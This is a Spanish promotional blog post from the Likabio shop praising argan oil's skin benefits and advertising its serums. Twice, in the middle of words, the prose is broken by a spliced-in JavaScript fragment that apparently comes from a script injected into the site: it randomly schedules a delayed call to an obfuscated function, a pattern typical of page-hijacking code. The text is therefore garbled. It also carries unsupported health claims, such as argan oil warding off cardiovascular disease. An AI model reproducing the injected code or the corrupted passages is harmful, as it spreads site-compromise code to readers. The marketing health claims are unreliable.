Cosmética natural

El aceite de argán, oro líquido para la piel

argán cosmética

El aceite de argán se ha convertido en un imprescindible de nuestro neceser por sus cualidades nutritivas e hidratantes. ¿Quieres conocer sus beneficios?. En Likabio sabemos la importancia de la cosmética natural. Esta es mucha más respetuosa con nuestra piel y con nuestro entorno. Además, aprovechamos todas las propiedades que la naturaleza nos ofrece para poner en tus manos los mejores productos.

El aceite de argán se extrae del fruto del árbol de argán, originario de Marruecos. Conocido como el oro líquido de Marruecos, es necesaria una gran cantidad de sus frutos para conseguir el preciado aceite. Este fruto es parecido a una almendra de mayor tamaño. Las semillas protegidas por una gruesa cáscara se machacan hasta conseguir el líquido.

Propiedades cosméticas del aceite de argán

El aceite de argán es rico en vitamina E y C, que actúa como antioxidante, previene el envejecimiento prematuro, hidrata, nutre y regenera la piel. El aceite de argán combate los radicales libres, que son los causantes del envejecimiento y de muchas enfermedades cardiovasculares. Es apto para todo tipo de pieles debido a que no obstruye los poros y por lo tanto deja transpirar la piel actuandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando así en las capas más profundas.

Su acción regeneradora lo convierte en un producto cosmético ideal para suavizar las marcas producidas por el acné y para prevenir la aparición de estrías. Esto extiende su uso en embarazadas que necesitan una flexibilidad extra en la piel.

argan oil

El aceite de argán, presente en muchos productos de Likabio, nutre e hidrata gracias a los ácidos grasos insaturados, que conservan la estructura celular y evitan la pérdida del agua de la piel. Ayuda a restaurar el metabolismo natural, reduciendo las arrugas, mejorandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando el estado de la piel y conservándola suave y tersa.

En Likabio cuidamos mucho los componentes de nuestros cosméticos, ofreciendo productos naturales y respetuosos con tu piel. El aceite de argán está presente en nuestros sérums e hidratantes por su poder relajante, reparador, nutritivo y anti-envejecimiento. Pásate por nuestra tienda on-line y descubre qué productos se adaptan a tus necesidades.

Etiquetas: , , , , , , ,